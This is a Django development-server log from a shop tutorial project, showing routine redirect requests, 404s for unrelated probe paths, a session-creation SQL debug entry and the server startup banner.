/aqgl/Comment.asp?ArticleID=33 HTTP/1.0" 404 6372 Not Found: /aqgl/Comment.asp [06/Jan/2020 19:00:23] "GET /aqgl/Comment.asp?ArticleID=34 HTTP/1.0" 404 6372 Not Found: /aqgl/Comment.asp [06/Jan/2020 19:00:30] "GET /aqgl/Comment.asp?ArticleID=399 HTTP/1.0" 404 6373 Not Found: /aqgl/Comment.asp [06/Jan/2020 19:01:18] "GET /aqgl/Comment.asp?ArticleID=88 HTTP/1.0" 404 6372 Not Found: /aqgl/Index.asp [06/Jan/2020 19:01:23] "GET /aqgl/Index.asp HTTP/1.0" 404 6353 Not Found: /aqgl/Print.asp [06/Jan/2020 19:01:34] "GET /aqgl/Print.asp?ArticleID=120 HTTP/1.0" 404 6367 Not Found: /aqgl/Print.asp [06/Jan/2020 19:01:40] "GET /aqgl/Print.asp?ArticleID=121 HTTP/1.0" 404 6367 Not Found: /aqgl/Print.asp [06/Jan/2020 19:01:46] "GET /aqgl/Print.asp?ArticleID=133 HTTP/1.0" 404 6367 Not Found: /aqgl/Print.asp [06/Jan/2020 19:02:13] "GET /aqgl/Print.asp?ArticleID=135 HTTP/1.0" 404 6367 Not Found: /aqgl/Print.asp [06/Jan/2020 19:03:54] "GET /aqgl/Print.asp?ArticleID=136 HTTP/1.0" 404 6367 Not Found: /aqgl/Print.asp [06/Jan/2020 19:04:21] "GET /aqgl/Print.asp?ArticleID=238 HTTP/1.0" 404 6367 Not Found: /aqgl/Print.asp [06/Jan/2020 19:04:33] "GET /aqgl/Print.asp?ArticleID=240 HTTP/1.0" 404 6367 Not Found: /aqgl/Print.asp [06/Jan/2020 19:04:39] "GET /aqgl/Print.asp?ArticleID=33 HTTP/1.0" 404 6366 [06/Jan/2020 19:05:02] "GET / HTTP/1.0" 302 0 [06/Jan/2020 19:10:05] "GET / HTTP/1.0" 302 0 [06/Jan/2020 19:15:08] "GET / HTTP/1.0" 302 0 Not Found: /main.dotm [06/Jan/2020 19:16:15] "GET /main.dotm HTTP/1.0" 404 6337 [06/Jan/2020 19:20:10] "GET / HTTP/1.0" 302 0 [06/Jan/2020 19:21:13] "GET / HTTP/1.0" 302 0 [06/Jan/2020 19:26:49] "GET / HTTP/1.0" 302 0 [06/Jan/2020 19:31:52] "GET / HTTP/1.0" 302 0 [06/Jan/2020 19:36:21] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-06 19:36:21,531 utils 27361 140408453592832 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'v8ucj1gcydlhwow711h72yw6k1ds9w9z' LIMIT 1; args=('v8ucj1gcydlhwow711h72yw6k1ds9w9z',) DEBUG 2020-01-06 19:36:21,532 utils 27361 140408453592832 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('v8ucj1gcydlhwow711h72yw6k1ds9w9z', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-20T19:36:21.531535+00:00'::timestamptz); args=('v8ucj1gcydlhwow711h72yw6k1ds9w9z', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 20, 19, 36, 21, 531535, tzinfo=)) [06/Jan/2020 19:36:21] "GET /login/?next=/ HTTP/1.0" 200 1786 [06/Jan/2020 19:36:54] "GET / HTTP/1.0" 302 0 [06/Jan/2020 19:41:57] "GET / HTTP/1.0" 302 0 [06/Jan/2020 19:47:00] "GET / HTTP/1.0" 302 0 [06/Jan/2020 19:52:03] "GET / HTTP/1.0" 302 0 [06/Jan/2020 19:57:05] "GET / HTTP/1.0" 302 0 [06/Jan/2020 20:05:03] "GET / HTTP/1.0" 302 0 [06/Jan/2020 20:09:29] "GET / HTTP/1.0" 302 0 [06/Jan/2020 20:14:49] "GET / HTTP/1.0" 302 0 [06/Jan/2020 20:19:52] "GET / HTTP/1.0" 302 0 [06/Jan/2020 20:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [06/Jan/2020 20:26:02] "GET / HTTP/1.0" 302 0 [06/Jan/2020 20:28:16] "GET / HTTP/1.0" 302 0 [06/Jan/2020 20:37:25] "GET / HTTP/1.0" 302 0 [06/Jan/2020 20:43:29] "GET / HTTP/1.0" 302 0 [06/Jan/2020 20:48:32] "GET / HTTP/1.0" 302 0 [06/Jan/2020 20:53:35] "GET / HTTP/1.0" 302 0 [06/Jan/2020 20:58:37] "GET / HTTP/1.0" 302 0 [06/Jan/2020 21:05:02] "GET / HTTP/1.0" 302 0 Performing system checks... January 03, 2020 - 03:52:28 Django version 2.2.7, using settings 'django_shop_tutorial.settings' Starting development server at http://127.0.0.1:8000/ Quit the server with CONTROL-C.